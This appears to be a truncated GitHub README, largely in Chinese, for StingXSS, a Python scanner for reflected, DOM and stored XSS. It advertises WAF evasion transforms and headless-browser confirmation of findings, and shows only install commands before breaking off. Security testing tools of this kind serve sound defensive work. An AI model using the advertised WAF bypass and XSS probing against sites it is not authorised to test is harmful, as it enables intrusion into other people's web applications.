CommonHuman-Lab/stingxss

GitHub: CommonHuman-Lab/stingxss

一款上下文感知的 XSS 扫描器，支持反射型、DOM 型、存储型 XSS 检测，具备 WAF 检测绕过和无头浏览器执行确认能力。

Stars: 5 | Forks: 0

# StingXSS [![Python](https://img.shields.io/badge/Python-3.10%2B-blue.svg)](https://www.python.org/) [![PyPI](https://img.shields.io/pypi/v/stingxss.svg)](https://pypi.org/project/stingxss/) [![License](https://img.shields.io/badge/License-AGPLv3-green.svg)](LICENSE) [![Security](https://img.shields.io/badge/Security-XSS%20Scanner-red.svg)](https://github.com/CommonHuman-Lab/stingxss) [![WAF Evasion](https://img.shields.io/badge/WAF%20Evasion-10%20transforms-orange.svg)](https://github.com/CommonHuman-Lab/stingxss/wiki/CLI-flags) [![Browser](https://img.shields.io/badge/Browser-Chromium-blueviolet.svg)](https://github.com/CommonHuman-Lab/stingxss/wiki/Browser-engine) **上下文感知的 XSS 扫描器** — 反射型、DOM 型、存储型以及经浏览器确认的 XSS，具备 WAF 检测与绕过能力。无需 Burp 许可证。只发现真实漏洞。 ``` pip install stingxss pip install stingxss[browser] # + headless browser engine # from source git clone https://github.com/CommonHuman-Lab/stingxss.git cd stingxss python -m stingxss ``` ## 为什么使用 StingXSS？ - **优先读取上下文** — 针对 `